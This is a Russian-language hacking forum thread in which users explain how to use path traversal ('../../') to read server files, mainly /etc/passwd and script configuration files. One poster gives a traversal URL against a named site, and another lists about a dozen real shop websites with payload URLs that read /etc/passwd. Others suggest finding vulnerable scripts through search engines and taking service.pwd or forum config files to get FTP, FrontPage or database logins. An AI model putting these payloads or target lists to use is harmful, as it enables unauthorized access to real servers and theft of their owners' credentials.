О баге /../../../../

[eRweB]

Все флудят про баг с юзаньем такого формата адреса /../../../../
Что это такое и как заюзать? Вот в видео от хакера видел...

Сразу говорю что про то что это возвращает на несколько уровней вверх я знаю...

Расскажите плз как это можно заюзать на примере...

 

[c31337]

Блин ну че тут непонятного. Это действительно "возвращает на несколько уровней вверх" Если есть баги в скриптах то это поможет получить файлы с пасами. Вопрос некоректный, так как конкретно баги связанной с /../../../../- нет.

 

[psih]

Предположим... например вот так:
http://www.firesmag.ru/cgi-bin/query.cgi?f..../../etc/passwd

зыЖ пользуйтесь наздоровье

 

[Winux]

блин, хорошая штука. Теперь бы тут разобраться)

 

[somebody]

вот что интересно: допустим я не имею доступа в папку etc. но если я введу ../../pass из папки etc/1/2, я ведь все равно не получу доступа к файлу
так какой в этом смысл?

 

[c31337]

Ну а если ты имеешь доступ в эту папку. Ведь так можно просматривать не только етк. Тут надо пофантазировать.

 

[acme]

не всегда нужно только etc/passwd
чаще всего лучше искать и скачивать конф. файлы скриптов и т.д., есстественно, если права позволяют...

 

[psih]

кстати, если кто не в курсе, то ищутся такие баги(кривые скрипты) довольно таки легко... вам не понадобится даже софт всё делается элементарно просто с помощью... google.ru а вот возможности которые дают потом такие скрипты иногда бывают оч даже не плохие

 

[UsAr]

To: psih
google сейчас очень умный стал, может сказать что у тебя вирус
есть еще несколько альтернитив
altavista.com, yahoo.com если поискать на офсайте то можно и список комманд найти

 

[c31337]

http://winux.net.ru/forum/index.php?showtopic=109 вот

 

[eRweB]

Побольше примеров.
Что еще можно с этого поиметь? Кроме пассов?

 

[Nicolas]

To: eRweB А тебе этого мало?

 

[Winux]

eRweB
Вот тебе примеры:
http://www.mixedbox.com/shop/index.php?&la..../../etc/passwd
http://talksoccer.net/shop/index.php?&lang..../../etc/passwd
http://lesmckeown.com/shopping/index.php?&..../../etc/passwd
http://www.lolclicks.com/shop/index.php?&l..../../etc/passwd
http://scraprats.com/shop/index.php?&langu..../../etc/passwd
http://vfts.co.uk/shop/index.php?&language..../../etc/passwd
http://canyoneeringusa.com/shop/index.php?..../../etc/passwd
http://darjeelingnews.net/darjeelingshoppi..../../etc/passwd
http://store.fightingautism.org/index.php?..../../etc/passwd
http://www.rorschachentertainment.com/shop..../../etc/passwd
http://scgames.trap17.com/shop/index.php?&..../../etc/passwd
http://www.escapewithet.com/shop/index.php..../../etc/passwd

Хватит?

 

[s3po]

Ну блин круто!!! :yes2:

 

[n1†R0x]

Что еще можно с этого поиметь? Кроме пассов?

А еще ты можешь получить список файлов в любой папке, которую укажешь, но только если позволяют права. Ну и соответственно слить оттудова всякую байду.

 

[durito]

а если тебе удасться найти файл service.pwd, то можешь получить доступ через фронпагу или фтп, в последнем случа если подойдет пасс

 

[_s61]

спасибо, что посветили, давно задавался тем же вопросом :bang:

 

[dampil]

А возможно такое на IPB ? К Примеру найти тама файл конфигурации и слить его к себе..а от туда утянуть логин и пасс к базе...

 

[©yBe®0Ge№]

так как вы в поисковике бажные сайты находите, а то ссылка не работает...

 

[dampil]

Мда...я тут ничерта не понял ..